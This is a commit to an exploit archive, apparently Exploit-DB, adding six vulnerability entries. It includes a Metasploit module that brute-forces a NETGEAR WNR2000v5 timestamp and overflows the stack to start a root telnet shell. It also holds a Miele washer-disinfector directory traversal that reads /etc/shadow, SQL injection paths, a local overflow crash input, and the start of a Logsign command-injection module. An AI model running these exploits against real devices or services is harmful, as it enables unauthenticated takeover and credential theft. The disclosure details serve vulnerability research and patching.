DB: 2017-03-25
6 new exploits wifirxpower - Local Buffer Overflow Miele Professional PG 8528 - Directory Traversal NETGEAR WNR2000v5 - (Un)authenticated hidden_lang_avi Stack Overflow (Metasploit) Logsign 4.4.2 / 4.4.137 - Remote Command Injection (Metasploit) Gr8 Tutorial Script - SQL Injection Gr8 Gallery Script - SQL Injection
This commit is contained in:
parent
3ad96f313d
commit
570f8aec26
7 changed files with 601 additions and 0 deletions
|
@ -5424,6 +5424,7 @@ id,file,description,date,author,platform,type,port
|
|||
41668,platforms/multiple/dos/41668.txt,"APNGDis 2.8 - 'chunk size descriptor' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
|
||||
41669,platforms/multiple/dos/41669.txt,"APNGDis 2.8 - 'image width / height chunk' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
|
||||
41670,platforms/multiple/dos/41670.txt,"APNGDis 2.8 - 'filename' Stack Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
|
||||
41715,platforms/linux/dos/41715.txt,"wifirxpower - Local Buffer Overflow",2017-03-23,"Nassim Asrir",linux,dos,0
|
||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||
|
@ -15384,6 +15385,9 @@ id,file,description,date,author,platform,type,port
|
|||
41693,platforms/multiple/remote/41693.rb,"Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit)",2003-03-07,Metasploit,multiple,remote,0
|
||||
41694,platforms/multiple/remote/41694.rb,"SSH - User Code Execution (Metasploit)",1999-01-01,Metasploit,multiple,remote,0
|
||||
41695,platforms/linux/remote/41695.rb,"Redmine SCM Repository - Arbitrary Command Execution (Metasploit)",2010-12-19,Metasploit,linux,remote,0
|
||||
41718,platforms/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",hardware,remote,0
|
||||
41719,platforms/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - (Un)authenticated hidden_lang_avi Stack Overflow (Metasploit)",2017-03-24,Metasploit,hardware,remote,80
|
||||
41720,platforms/python/remote/41720.rb,"Logsign 4.4.2 / 4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,Metasploit,python,remote,0
|
||||
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||
|
@ -37621,3 +37625,5 @@ id,file,description,date,author,platform,type,port
|
|||
41697,platforms/linux/webapps/41697.rb,"SixApart MovableType < 5.2.12 - Storable Perl Code Execution (Metasploit)",2015-02-11,Metasploit,linux,webapps,0
|
||||
41698,platforms/linux/webapps/41698.rb,"WordPress Theme Holding Pattern - Arbitrary File Upload (Metasploit)",2015-02-11,Metasploit,linux,webapps,0
|
||||
41714,platforms/windows/webapps/41714.rb,"Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)",2012-04-08,Metasploit,windows,webapps,0
|
||||
41716,platforms/php/webapps/41716.txt,"Gr8 Tutorial Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
|
||||
41717,platforms/php/webapps/41717.txt,"Gr8 Gallery Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
69
platforms/hardware/remote/41718.txt
Executable file
69
platforms/hardware/remote/41718.txt
Executable file
|
@ -0,0 +1,69 @@
|
|||
Title:
|
||||
======
|
||||
Miele Professional PG 8528 - Web Server Directory Traversal
|
||||
|
||||
Author:
|
||||
=======
|
||||
Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG
|
||||
|
||||
CVE-ID:
|
||||
=======
|
||||
CVE-2017-7240
|
||||
|
||||
Risk Information:
|
||||
=================
|
||||
Risk Factor: Medium
|
||||
CVSS Base Score: 5.0
|
||||
CVSS Vector: CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N
|
||||
CVSS Temporal Vector: CVSS2#E:POC/RL:OF/RC:C
|
||||
CVSS Temporal Score: 3.9
|
||||
|
||||
Timeline:
|
||||
=========
|
||||
2016-11-16 Vulnerability discovered
|
||||
2016-11-10 Asked for security contact
|
||||
2016-11-21 Contact with Miele product representative
|
||||
2016-12-03 Send details to the Miele product representative
|
||||
2017-01-19 Asked for update, no response
|
||||
2017-02-03 Asked for update, no response
|
||||
2017-03-23 Public disclosure
|
||||
|
||||
Status:
|
||||
=======
|
||||
Published
|
||||
|
||||
Affected Products:
|
||||
==================
|
||||
Miele Professional PG 8528 (washer-disinfector) with ethernet interface.
|
||||
|
||||
Vendor Homepage:
|
||||
================
|
||||
https://www.miele.co.uk/professional/large-capacity-washer-disinfectors-560.htm?mat=10339600&name=PG_8528
|
||||
|
||||
Details:
|
||||
========
|
||||
The corresponding embeded webserver "PST10 WebServer" typically listens to port 80 and is prone to a directory traversal attack, therefore an unauthenticated attacker may be able to exploit this issue to access sensitive information to aide in subsequent attacks.
|
||||
|
||||
Proof of Concept:
|
||||
=================
|
||||
~$ telnet 192.168.0.1 80
|
||||
Trying 192.168.0.1...
|
||||
Connected to 192.168.0.1.
|
||||
Escape character ist '^]'.
|
||||
GET /../../../../../../../../../../../../etc/shadow HTTP/1.1
|
||||
|
||||
HTTP/1.1 200 OK
|
||||
Date: Wed, 16 Nov 2016 11:58:50 GMT
|
||||
Server: PST10 WebServer
|
||||
Content-Type: application/octet-stream
|
||||
Last-Modified: Fri, 22 Feb 2013 10:04:40 GMT
|
||||
Content-disposition: attachment; filename="./etc/shadow"
|
||||
Accept-Ranges: bytes
|
||||
Content-Length: 52
|
||||
|
||||
root:$1$$Md0i[...snip...]Z001:10933:0:99999:7:::
|
||||
|
||||
Fix:
|
||||
====
|
||||
We are not aware of an actual fix.
|
||||
|
270
platforms/hardware/remote/41719.rb
Executable file
270
platforms/hardware/remote/41719.rb
Executable file
|
@ -0,0 +1,270 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'time'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::CRand
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'NETGEAR WNR2000v5 (Un)authenticated hidden_lang_avi Stack Overflow',
|
||||
'Description' => %q{
|
||||
The NETGEAR WNR2000 router has a buffer overflow vulnerability in the hidden_lang_avi
|
||||
parameter.
|
||||
In order to exploit it, it is necessary to guess the value of a certain timestamp which
|
||||
is in the configuration of the router. An authenticated attacker can simply fetch this
|
||||
from a page, but an unauthenticated attacker has to brute force it.
|
||||
Bruteforcing the timestamp token might take a few minutes, a few hours, or days, but
|
||||
it is guaranteed that it can be bruteforced.
|
||||
This module implements both modes, and it works very reliably. It has been tested with
|
||||
the WNR2000v5, firmware versions 1.0.0.34 and 1.0.0.18. It should also work with hardware
|
||||
revisions v4 and v3, but this has not been tested - with these routers it might be necessary
|
||||
to adjust the LibcBase variable as well as the gadget addresses.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Pedro Ribeiro <pedrib@gmail.com>' # Vulnerability discovery and Metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => ['unix'],
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2016-10174'],
|
||||
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear-wnr2000.txt'],
|
||||
['URL', 'http://seclists.org/fulldisclosure/2016/Dec/72'],
|
||||
['URL', 'http://kb.netgear.com/000036549/Insecure-Remote-Access-and-Command-Execution-Security-Vulnerability']
|
||||
],
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'NETGEAR WNR2000v5',
|
||||
{
|
||||
'LibcBase' => 0x2ab24000, # should be the same offset for all firmware versions (in libuClibc-0.9.30.1.so)
|
||||
'SystemOffset' => 0x547D0,
|
||||
'GadgetOffset' => 0x2462C,
|
||||
#The ROP gadget will load $sp into $a0 (which will contain the system() command) and call $s0 (which will contain the address of system()):
|
||||
#LOAD:0002462C addiu $a0, $sp, 0x40+arg_0
|
||||
#LOAD:00024630 move $t9, $s0
|
||||
#LOAD:00024634 jalr $t9
|
||||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "\x00\x25\x26",
|
||||
'Compat' => {
|
||||
'PayloadType' => 'cmd_interact',
|
||||
'ConnectionType' => 'find',
|
||||
},
|
||||
},
|
||||
}
|
||||
],
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Arch' => ARCH_CMD,
|
||||
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
|
||||
'DisclosureDate' => 'Dec 20 2016',
|
||||
'DefaultTarget' => 0))
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(80),
|
||||
OptString.new('HttpUsername', [true, 'Username for the web interface (not needed but exploitation is faster)', 'admin']),
|
||||
OptString.new('HttpPassword', [true, 'Password for the web interface (not needed but exploitation is faster)', 'password']),
|
||||
], self.class)
|
||||
register_advanced_options(
|
||||
[
|
||||
OptInt.new('TIME_OFFSET', [true, 'Maximum time differential to try', 5000]),
|
||||
OptInt.new('TIME_SURPLUS', [true, 'Increase this if you are sure the device is vulnerable and you are not getting a shell', 200])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
res = send_request_cgi({
|
||||
'uri' => '/',
|
||||
'method' => 'GET'
|
||||
})
|
||||
if res && res.headers['WWW-Authenticate']
|
||||
auth = res.headers['WWW-Authenticate']
|
||||
if auth =~ /WNR2000v5/
|
||||
return Exploit::CheckCode::Detected
|
||||
elsif auth =~ /WNR2000v4/ || auth =~ /WNR2000v3/
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
end
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def uri_encode (str)
|
||||
"%" + str.scan(/.{2}|.+/).join("%")
|
||||
end
|
||||
|
||||
def calc_address (libc_base, offset)
|
||||
addr = (libc_base + offset).to_s(16)
|
||||
uri_encode(addr)
|
||||
end
|
||||
|
||||
def get_current_time
|
||||
res = send_request_cgi({
|
||||
'uri' => '/',
|
||||
'method' => 'GET'
|
||||
})
|
||||
if res && res['Date']
|
||||
date = res['Date']
|
||||
return Time.parse(date).strftime('%s').to_i
|
||||
end
|
||||
end
|
||||
|
||||
def get_auth_timestamp
|
||||
res = send_request_raw({
|
||||
'uri' => '/lang_check.html',
|
||||
'method' => 'GET',
|
||||
# automatically uses HttpPassword and HttpUsername to authenticate
|
||||
})
|
||||
if res && res.code == 401
|
||||
# try again, might fail the first time
|
||||
res = send_request_raw({
|
||||
'uri' => '/lang_check.html',
|
||||
'method' => 'GET',
|
||||
# automatically uses HttpPassword and HttpUsername to authenticate
|
||||
})
|
||||
end
|
||||
if res && res.code == 200
|
||||
if res.body =~ /timestamp=([0-9]{8})/
|
||||
$1.to_i
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
# Do some crazyness to force Ruby to cast to a single-precision float and
|
||||
# back to an integer.
|
||||
# This emulates the behaviour of the soft-fp library and the float cast
|
||||
# which is done at the end of Netgear's timestamp generator.
|
||||
def ieee754_round (number)
|
||||
[number].pack('f').unpack('f*')[0].to_i
|
||||
end
|
||||
|
||||
|
||||
# This is the actual algorithm used in the get_timestamp function in
|
||||
# the Netgear firmware.
|
||||
def get_timestamp(time)
|
||||
srandom_r time
|
||||
t0 = random_r
|
||||
t1 = 0x17dc65df;
|
||||
hi = (t0 * t1) >> 32;
|
||||
t2 = t0 >> 31;
|
||||
t3 = hi >> 23;
|
||||
t3 = t3 - t2;
|
||||
t4 = t3 * 0x55d4a80;
|
||||
t0 = t0 - t4;
|
||||
t0 = t0 + 0x989680;
|
||||
|
||||
ieee754_round(t0)
|
||||
end
|
||||
|
||||
def get_payload
|
||||
rand_text_alpha(36) + # filler_1
|
||||
calc_address(target['LibcBase'], target['SystemOffset']) + # s0
|
||||
rand_text_alpha(12) + # s1, s2 and s3
|
||||
calc_address(target['LibcBase'], target['GadgetOffset']) + # gadget
|
||||
rand_text_alpha(0x40) + # filler_2
|
||||
"killall telnetenable; killall utelnetd; /usr/sbin/utelnetd -d -l /bin/sh" # payload
|
||||
end
|
||||
|
||||
def send_req(timestamp)
|
||||
begin
|
||||
uri_str = (timestamp == nil ? \
|
||||
"/apply_noauth.cgi?/lang_check.html" : \
|
||||
"/apply_noauth.cgi?/lang_check.html%20timestamp=#{timestamp.to_s}")
|
||||
res = send_request_raw({
|
||||
'uri' => uri_str,
|
||||
'method' => 'POST',
|
||||
'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' },
|
||||
'data' => "submit_flag=select_language&hidden_lang_avi=#{get_payload}"
|
||||
})
|
||||
rescue ::Errno::ETIMEDOUT, ::Errno::ECONNRESET, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
|
||||
return
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
# 1: try to see if the default admin username and password are set
|
||||
timestamp = get_auth_timestamp
|
||||
|
||||
# 2: now we try two things at once:
|
||||
# one, if the timestamp is not nil then we got an authenticated timestamp, let's try that
|
||||
# two, if the timestamp is nil, then let's try without timestamp first (the timestamp only gets set if the user visited the page before)
|
||||
print_status("#{peer} - Trying the easy way out first")
|
||||
send_req(timestamp)
|
||||
begin
|
||||
ctx = { 'Msf' => framework, 'MsfExploit' => self }
|
||||
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => 23, 'Context' => ctx, 'Timeout' => 10 })
|
||||
if not sock.nil?
|
||||
print_good("#{peer} - Success, shell incoming!")
|
||||
return handler(sock)
|
||||
end
|
||||
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
|
||||
sock.close if sock
|
||||
end
|
||||
|
||||
print_bad("#{peer} - Well that didn't work... let's do it the hard way.")
|
||||
|
||||
# no shell? let's just go on and bruteforce the timestamp
|
||||
# 3: get the current date from the router and parse it
|
||||
end_time = get_current_time
|
||||
if end_time.nil?
|
||||
fail_with(Failure::Unknown, "#{peer} - Unable to obtain current time")
|
||||
end
|
||||
if end_time <= datastore['TIME_OFFSET']
|
||||
start_time = 0
|
||||
else
|
||||
start_time = end_time - datastore['TIME_OFFSET']
|
||||
end
|
||||
end_time += datastore['TIME_SURPLUS']
|
||||
|
||||
if end_time < (datastore['TIME_SURPLUS'] * 7.5).to_i
|
||||
end_time = (datastore['TIME_SURPLUS'] * 7.5).to_i
|
||||
end
|
||||
|
||||
print_good("#{peer} - Got time #{end_time} from router, starting exploitation attempt.")
|
||||
print_status("#{peer} - Be patient, this might take a long time (typically a few minutes, but it might take hours).")
|
||||
|
||||
# 2: work back from the current router time minus datastore['TIME_OFFSET']
|
||||
while true
|
||||
for time in end_time.downto(start_time)
|
||||
timestamp = get_timestamp(time)
|
||||
sleep 0.1
|
||||
if time % 400 == 0
|
||||
print_status("#{peer} - Still working, trying time #{time}")
|
||||
end
|
||||
send_req(timestamp)
|
||||
begin
|
||||
ctx = { 'Msf' => framework, 'MsfExploit' => self }
|
||||
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => 23, 'Context' => ctx, 'Timeout' => 10 })
|
||||
if sock.nil?
|
||||
next
|
||||
end
|
||||
print_status("#{peer} - Success, shell incoming!")
|
||||
return handler(sock)
|
||||
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
|
||||
sock.close if sock
|
||||
next
|
||||
end
|
||||
end
|
||||
end_time = start_time
|
||||
start_time -= datastore['TIME_OFFSET']
|
||||
if start_time < 0
|
||||
if end_time <= datastore['TIME_OFFSET']
|
||||
fail_with(Failure::Unknown, "#{peer} - Exploit failed.")
|
||||
end
|
||||
start_time = 0
|
||||
end
|
||||
print_status("#{peer} - Going for another round, finishing at #{start_time} and starting at #{end_time}")
|
||||
|
||||
# let the router clear the buffers a bit...
|
||||
sleep 30
|
||||
end
|
||||
end
|
||||
end
|
141
platforms/linux/dos/41715.txt
Executable file
141
platforms/linux/dos/41715.txt
Executable file
|
@ -0,0 +1,141 @@
|
|||
[+] Title: wifirxpower - Local Stack Based Buffer Overflow
|
||||
[+] Credits / Discovery: Nassim Asrir
|
||||
[+] Author Email: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
|
||||
[+] Author Company: Henceforth
|
||||
[+] CVE: N/A
|
||||
|
||||
Vendor:
|
||||
===============
|
||||
|
||||
https://github.com/cnlohr/wifirxpower
|
||||
|
||||
|
||||
Download:
|
||||
===========
|
||||
|
||||
https://github.com/cnlohr/wifirxpower
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
===================
|
||||
|
||||
Local Stack Based Buffer Overflow
|
||||
|
||||
|
||||
issue:
|
||||
===================
|
||||
|
||||
'wifirx.c' contain a vulnerable code in the line '111' the developer use the 'strcpy' function and does not check the buffer destination and cause a Stack Oveflow.
|
||||
|
||||
Vulnerable Code (102 - 124) wifirx.c:
|
||||
===================
|
||||
int GetQuality( const char * interface, int * noise )
|
||||
{
|
||||
int sockfd;
|
||||
struct iw_statistics stats;
|
||||
struct iwreq req;
|
||||
|
||||
|
||||
memset(&stats, 0, sizeof(stats));
|
||||
memset(&req, 0, sizeof(struct iwreq));
|
||||
strcpy( req.ifr_name, interface );
|
||||
req.u.data.pointer = &stats;
|
||||
req.u.data.length = sizeof(struct iw_statistics);
|
||||
#ifdef CLEAR_UPDATED
|
||||
req.u.data.flags = 1;
|
||||
#endif
|
||||
|
||||
/* Any old socket will do, and a datagram socket is pretty cheap */
|
||||
if((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) == -1) {
|
||||
if( first ) perror("Could not create simple datagram socket");
|
||||
first = 0;
|
||||
//exit(EXIT_FAILURE);
|
||||
return -1;
|
||||
}
|
||||
|
||||
|
||||
Exploit:
|
||||
=========
|
||||
|
||||
1 - ./wifirx aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
|
||||
|
||||
2 - r $(python -c 'print"A"*41')
|
||||
|
||||
Backtrace:
|
||||
=========
|
||||
/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x37)[0x7ffff6ec3e37]
|
||||
/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x0)[0x7ffff6ec3e00]
|
||||
/home/bugtraq/Desktop/wifirxpower-master/wifirx[0x401aaa]
|
||||
/home/bugtraq/Desktop/wifirxpower-master/wifirx[0x401d21]
|
||||
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xed)[0x7ffff6ddb7ed]
|
||||
/home/bugtraq/Desktop/wifirxpower-master/wifirx[0x401449]
|
||||
|
||||
Memory Map:
|
||||
===========
|
||||
00606000-0062a000 rw-p 00000000 00:00 0 [heap]
|
||||
7ffff6379000-7ffff638e000 r-xp 00000000 08:01 7606631 /lib/x86_64-linux-gnu/libgcc_s.so.1
|
||||
7ffff638e000-7ffff658d000 ---p 00015000 08:01 7606631 /lib/x86_64-linux-gnu/libgcc_s.so.1
|
||||
7ffff658d000-7ffff658e000 r--p 00014000 08:01 7606631 /lib/x86_64-linux-gnu/libgcc_s.so.1
|
||||
7ffff658e000-7ffff658f000 rw-p 00015000 08:01 7606631 /lib/x86_64-linux-gnu/libgcc_s.so.1
|
||||
7ffff658f000-7ffff6594000 r-xp 00000000 08:01 3027725 /usr/lib/x86_64-linux-gnu/libXdmcp.so.6.0.0
|
||||
7ffff6594000-7ffff6793000 ---p 00005000 08:01 3027725 /usr/lib/x86_64-linux-gnu/libXdmcp.so.6.0.0
|
||||
7ffff6793000-7ffff6794000 r--p 00004000 08:01 3027725 /usr/lib/x86_64-linux-gnu/libXdmcp.so.6.0.0
|
||||
7ffff6794000-7ffff6795000 rw-p 00005000 08:01 3027725 /usr/lib/x86_64-linux-gnu/libXdmcp.so.6.0.0
|
||||
7ffff6795000-7ffff6797000 r-xp 00000000 08:01 3027706 /usr/lib/x86_64-linux-gnu/libXau.so.6.0.0
|
||||
7ffff6797000-7ffff6996000 ---p 00002000 08:01 3027706 /usr/lib/x86_64-linux-gnu/libXau.so.6.0.0
|
||||
7ffff6996000-7ffff6997000 r--p 00001000 08:01 3027706 /usr/lib/x86_64-linux-gnu/libXau.so.6.0.0
|
||||
7ffff6997000-7ffff6998000 rw-p 00002000 08:01 3027706 /usr/lib/x86_64-linux-gnu/libXau.so.6.0.0
|
||||
7ffff6998000-7ffff699a000 r-xp 00000000 08:01 7602253 /lib/x86_64-linux-gnu/libdl-2.15.so
|
||||
7ffff699a000-7ffff6b9a000 ---p 00002000 08:01 7602253 /lib/x86_64-linux-gnu/libdl-2.15.so
|
||||
7ffff6b9a000-7ffff6b9b000 r--p 00002000 08:01 7602253 /lib/x86_64-linux-gnu/libdl-2.15.so
|
||||
7ffff6b9b000-7ffff6b9c000 rw-p 00003000 08:01 7602253 /lib/x86_64-linux-gnu/libdl-2.15.so
|
||||
7ffff6b9c000-7ffff6bb9000 r-xp 00000000 08:01 3015326 /usr/lib/x86_64-linux-gnu/libxcb.so.1.1.0
|
||||
7ffff6bb9000-7ffff6db8000 ---p 0001d000 08:01 3015326 /usr/lib/x86_64-linux-gnu/libxcb.so.1.1.0
|
||||
7ffff6db8000-7ffff6db9000 r--p 0001c000 08:01 3015326 /usr/lib/x86_64-linux-gnu/libxcb.so.1.1.0
|
||||
7ffff6db9000-7ffff6dba000 rw-p 0001d000 08:01 3015326 /usr/lib/x86_64-linux-gnu/libxcb.so.1.1.0
|
||||
7ffff6dba000-7ffff6f6e000 r-xp 00000000 08:01 7606751 /lib/x86_64-linux-gnu/libc-2.15.so
|
||||
7ffff6f6e000-7ffff716d000 ---p 001b4000 08:01 7606751 /lib/x86_64-linux-gnu/libc-2.15.so
|
||||
7ffff716d000-7ffff7171000 r--p 001b3000 08:01 7606751 /lib/x86_64-linux-gnu/libc-2.15.so
|
||||
7ffff7171000-7ffff7173000 rw-p 001b7000 08:01 7606751 /lib/x86_64-linux-gnu/libc-2.15.so
|
||||
7ffff7173000-7ffff7178000 rw-p 00000000 00:00 0
|
||||
7ffff7178000-7ffff7188000 r-xp 00000000 08:01 3022902 /usr/lib/x86_64-linux-gnu/libXext.so.6.4.0
|
||||
7ffff7188000-7ffff7387000 ---p 00010000 08:01 3022902 /usr/lib/x86_64-linux-gnu/libXext.so.6.4.0
|
||||
7ffff7387000-7ffff7388000 r--p 0000f000 08:01 3022902 /usr/lib/x86_64-linux-gnu/libXext.so.6.4.0
|
||||
7ffff7388000-7ffff7389000 rw-p 00010000 08:01 3022902 /usr/lib/x86_64-linux-gnu/libXext.so.6.4.0
|
||||
7ffff7389000-7ffff738b000 r-xp 00000000 08:01 3022982 /usr/lib/x86_64-linux-gnu/libXinerama.so.1.0.0
|
||||
7ffff738b000-7ffff758a000 ---p 00002000 08:01 3022982 /usr/lib/x86_64-linux-gnu/libXinerama.so.1.0.0
|
||||
7ffff758a000-7ffff758b000 r--p 00001000 08:01 3022982 /usr/lib/x86_64-linux-gnu/libXinerama.so.1.0.0
|
||||
7ffff758b000-7ffff758c000 rw-p 00002000 08:01 3022982 /usr/lib/x86_64-linux-gnu/libXinerama.so.1.0.0
|
||||
7ffff758c000-7ffff75a4000 r-xp 00000000 08:01 7606754 /lib/x86_64-linux-gnu/libpthread-2.15.so
|
||||
7ffff75a4000-7ffff77a3000 ---p 00018000 08:01 7606754 /lib/x86_64-linux-gnu/libpthread-2.15.so
|
||||
7ffff77a3000-7ffff77a4000 r--p 00017000 08:01 7606754 /lib/x86_64-linux-gnu/libpthread-2.15.so
|
||||
7ffff77a4000-7ffff77a5000 rw-p 00018000 08:01 7606754 /lib/x86_64-linux-gnu/libpthread-2.15.so
|
||||
7ffff77a5000-7ffff77a9000 rw-p 00000000 00:00 0
|
||||
7ffff77a9000-7ffff78a4000 r-xp 00000000 08:01 7606762 /lib/x86_64-linux-gnu/libm-2.15.so
|
||||
7ffff78a4000-7ffff7aa3000 ---p 000fb000 08:01 7606762 /lib/x86_64-linux-gnu/libm-2.15.so
|
||||
7ffff7aa3000-7ffff7aa4000 r--p 000fa000 08:01 7606762 /lib/x86_64-linux-gnu/libm-2.15.so
|
||||
7ffff7aa4000-7ffff7aa5000 rw-p 000fb000 08:01 7606762 /lib/x86_64-linux-gnu/libm-2.15.so
|
||||
7ffff7aa5000-7ffff7bd5000 r-xp 00000000 08:01 3015330 /usr/lib/x86_64-linux-gnu/libX11.so.6.3.0
|
||||
7ffff7bd5000-7ffff7dd5000 ---p 00130000 08:01 3015330 /usr/lib/x86_64-linux-gnu/libX11.so.6.3.0
|
||||
7ffff7dd5000-7ffff7dd6000 r--p 00130000 08:01 3015330 /usr/lib/x86_64-linux-gnu/libX11.so.6.3.0
|
||||
7ffff7dd6000-7ffff7dda000 rw-p 00131000 08:01 3015330 /usr/lib/x86_64-linux-gnu/libX11.so.6.3.0
|
||||
7ffff7dda000-7ffff7dfc000 r-xp 00000000 08:01 7606759 /lib/x86_64-linux-gnu/ld-2.15.so
|
||||
7ffff7fd5000-7ffff7fdb000 rw-p 00000000 00:00 0
|
||||
7ffff7ff7000-7ffff7ffb000 rw-p 00000000 00:00 0
|
||||
7ffff7ffb000-7ffff7ffc000 r-xp 00000000 00:00 0 [vdso]
|
||||
7ffff7ffc000-7ffff7ffd000 r--p 00022000 08:01 7606759 /lib/x86_64-linux-gnu/ld-2.15.so
|
||||
7ffff7ffd000-7ffff7fff000 rw-p 00023000 08:01 7606759 /lib/x86_64-linux-gnu/ld-2.15.so
|
||||
7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0 [stack]
|
||||
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
|
||||
|
||||
|
||||
Tested on:
|
||||
===============
|
||||
|
||||
Linux Ubuntu x86_64
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
19
platforms/php/webapps/41716.txt
Executable file
19
platforms/php/webapps/41716.txt
Executable file
|
@ -0,0 +1,19 @@
|
|||
# # # # #
|
||||
# Exploit Title: Gr8 Tutorial Script - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 24.03.2017
|
||||
# Vendor Homepage: http://gr8script.com/
|
||||
# Software: http://gr8script.com/gr8_tutorial_script.php
|
||||
# Demo: http://www.gr8script.com/gr8tutorial/
|
||||
# Version: N/A
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# #ihsansencan
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/users.php?user=[SQL]
|
||||
# http://localhost/[PATH]/track/54[SQL]
|
||||
# # # # #
|
19
platforms/php/webapps/41717.txt
Executable file
19
platforms/php/webapps/41717.txt
Executable file
|
@ -0,0 +1,19 @@
|
|||
# # # # #
|
||||
# Exploit Title: Gr8 Gallery Script - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 24.03.2017
|
||||
# Vendor Homepage: http://gr8script.com/
|
||||
# Software: http://gr8script.com/gr8gallery.php
|
||||
# Demo: http://www.gr8script.com/gr8gallery/
|
||||
# Version: N/A
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# #ihsansencan
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/video-gallery/X[SQL]
|
||||
# http://localhost/[PATH]/photo-gallery/X[SQL]
|
||||
# # # # #
|
77
platforms/python/remote/41720.rb
Executable file
77
platforms/python/remote/41720.rb
Executable file
|
@ -0,0 +1,77 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => 'Logsign Remote Command Injection',
|
||||
'Description' => %q{
|
||||
This module exploits an command injection vulnerability in Logsign.
|
||||
By exploiting this vulnerability, unauthenticated users can execute
|
||||
arbitrary code under the root user.
|
||||
|
||||
Logsign has a publicly accessible endpoint. That endpoint takes a user
|
||||
input and then use it during operating system command execution without
|
||||
proper validation.
|
||||
|
||||
